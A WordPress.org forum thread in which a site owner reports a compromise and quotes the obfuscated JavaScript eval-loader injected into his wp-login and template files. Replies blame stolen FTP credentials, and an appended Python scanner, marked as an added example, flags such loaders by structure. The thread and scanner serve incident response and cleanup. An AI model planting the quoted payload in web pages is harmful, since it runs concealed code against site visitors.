WordPress.org

Forums

2.5.1 hacked? (4 posts)

  1. mikejandreau
    Member
    Posted 6 years ago #

    Looks like at around 8:48AM this morning, someone got into my WordPress installs (all 11 of them, in my account), and managed to add code to wp-login:

    script language=JavaScript>function hmlyban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,52,34,14,32,57,59,46,0,
    0,0,0,0,0,13,28,60,23,2,39,5,61,44,29,26,53,25,12,22,10,6,8,7,51,35,54,9,27,
    30,18,42,0,0,0,0,20,0,45,31,4,15,33,55,62,36,3,58,38,24,41,50,43,0,21,17,56,
    16,40,19,48,1,47,49);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);
    i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCo
    i>de(1
    55^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}hmlyban('H2bG0vd8K4g8j098uWOybvbGg
    S2u0vdg9Wy0K0XaHE9By80HBXZBGE9gU809KoyGgWjZjfJZu92jmTym7508yyXu3Y2Zo2d0uCoBK
    fdG3g5ahn2HNo08SCWj38XG0doKj0gBKk9gK0dGUdoHzkZZ4njunD2yoZbom4OywnW98n9B00gBk
    4OZu98Bg2d0S09maUj9u09sf8ym7gyBuygGj2XuKvbGgEWmEYoBGE9gU8bmBO2')</script

    Anyone know of any vulnerabilities? My directories were changed to 715 (I think my host did that) this morning, as well.

    Anyone know what's going on? I deleted the code, and uploaded a clean copy, and am checking the rest of my directories for stuff changed this morning, as well.

  2. mikejandreau
    Member
    Posted 6 years ago #

    They managed to hit files that weren't 775 or 777, mostly every header, footer, and index file in every directory in every domain.

    My host has been less than responsive (ignoring chats, and hanging up on me when I call).

    Anyone have any ideas?

  3. > My host has been less than responsive (ignoring chats, and hanging up on me when I call)
    >
    > Anyone have any ideas?

    Switch hosts.

  4. dualtech
    Member
    Posted 6 years ago #

    I've seen almost exactly the same JS code inserted into HTML and PHP files for WP and non-WP sites. We are pretty sure ours was the result of a compromised client computer with cached FTP usernames and passwords.

    For each FTP account that was compromised, the function name, the string passed to it, and the numeric array were different. In our case, they inserted the script at the opening and closing body tags of any documents that contained them.
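Added example, not part of any post in this thread: because the function name, encoded string and numeric array differ per compromised account, a cleanup scan has to match the loader's structure rather than its literal text. The sketch below flags script blocks in HTML and PHP files that combine a long numeric `Array(...)` table, `charCodeAt`/`fromCharCode`/`eval`, and an immediate call with one long string; the thresholds, file extensions and sample strings are assumptions constructed for illustration.

```python
import os
import re
import sys

# Structural markers of the loader described in this thread. The function name,
# numeric table and encoded string differ per compromise, so none is matched literally.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
FUNC_RE = re.compile(r"function\s+(\w+)\s*\(\s*\w+\s*\)")
TABLE_RE = re.compile(r"Array\(\s*\d+(?:\s*,\s*\d+){20,}\s*\)")  # long lookup table
MARKERS = ("charCodeAt", "fromCharCode", "eval(")

def find_injected_loaders(text):
    """Return [(function_name, offset)] for script blocks shaped like the loader."""
    hits = []
    for block in SCRIPT_RE.finditer(text):
        body = block.group(1)
        if not TABLE_RE.search(body) or not all(m in body for m in MARKERS):
            continue
        for func in FUNC_RE.finditer(body):
            name = func.group(1)
            # The decoder is called at once with one long quoted string
            # (assumed minimum length: 40 characters).
            call = re.escape(name) + r"\(\s*(['\"])[\w+/=]{40,}\1\s*\)"
            if re.search(call, body):
                hits.append((name, block.start()))
                break
    return hits

def scan_tree(root, exts=(".php", ".html", ".htm")):
    """Yield (path, function_name, offset) for each suspect block under root."""
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(exts):
                path = os.path.join(dirpath, fname)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for name, off in find_injected_loaders(fh.read()):
                        yield path, name, off

# Constructed samples (not the payload from the thread): same shape, inert content.
SAMPLE_INFECTED = ("<html><body><script language=JavaScript>function qzx(x){var t=Array("
                   + ",".join(map(str, range(30)))
                   + ");eval(String.fromCharCode(t[x.charCodeAt(0)-48]));}qzx('"
                   + "A" * 60 + "')</script><p>hi</p></body></html>")
SAMPLE_CLEAN = "<script>function init(a){return Array(1,2,3);}init('x')</script>"

if __name__ == "__main__":
    for hit in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("%s: loader function %r at offset %d" % hit)
```

Run it against the web root of each site; a hit only marks a file for manual review and restoration from a clean copy, and the FTP credentials involved should be changed before re-uploading.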

Topic Closed

This topic has been closed to new replies.
